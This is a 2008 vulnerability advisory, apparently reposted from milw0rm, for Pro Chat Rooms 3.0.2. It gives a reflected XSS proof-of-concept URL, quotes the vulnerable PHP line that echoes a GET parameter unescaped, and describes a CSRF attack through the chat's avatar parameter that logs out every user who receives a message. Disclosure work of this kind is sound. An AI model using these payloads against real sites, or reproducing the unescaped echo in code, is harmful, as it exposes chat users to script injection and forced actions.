Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery



EKU-ID: 15257 CVE: OSVDB-50697;CVE-2008-6502;OSVDB-50696;CVE-2008-6501 OSVDB-ID:
Author: ZynbER Published: 2008-12-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################
Pro Chat Rooms Version 3.0.2  (XSS/CSRF) Vulnerabilties
#########################################################################


## AUTHOR : ZynbER
## MAiL   : ZynbER[at]Gmail[dot]com
## HOME   : NoWhere


## Script WebSite : http://www.prochatrooms.com

## Version : Pro Chat Rooms Version 3.0.2


## EXPLOITS :

-==XSS==-

http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED

Vulnerable code in "/profiles/index.php"


<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>


-==CSRF==-

When a user sends a message in public room or in pm to onther user ; there is a parameter
to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message

The JS sending function; here u can see all params needed to POST a message to user/room

//Add a message to the chat server.
function sendChatText() {

if(!document.getElementById('txt_message').value) {
   alert("You have not entered a message ");
   return;
}
    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
    alert("You cannot whisper to yourself! ");
    return;
}
if (sendReq.readyState == 4 || sendReq.readyState == 0) {
    sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
    sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    sendReq.onreadystatechange = handleSendChat;
    var param = 'message=' + document.getElementById('txt_message').value;
    param += '&name=' + chat_user;
    param += '&nid=' + chat_userid;
    param += '&chat=1';
    param += '&room=' + room;
    param += '&whisper=' + document.getElementById('whisper').value;
    param += '&fontface=' + document.getElementById('font_face').value;
    param += '&fontcolor=' + document.getElementById('font_color').value;
    param += '&fontheight=' + document.getElementById('font_height').value;
    param += '&fontstyle=' + document.getElementById('font_style').value;
    param += '&avatar=' + document.getElementById('user_avatar').value;
    sendReq.send(param);
    document.getElementById('txt_message').value = '';
    }
}


Exploit Example:

default  ==> http://www.yoursite.com/[path]/Avatars/online.gif


Your mallecious CSRF param;  avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php


in this example the user will logout when he recieves ur message; in a public room all users will
be loged out from the room ;)




## Note:

This infos are for educational purpose only;
I'm not responsable for any damage caused...



## GREETZ  :  Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka

        -=== Marequin est fière de l'être ===-

#########################################################################
Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilties
#########################################################################

# milw0rm.com [2008-12-10]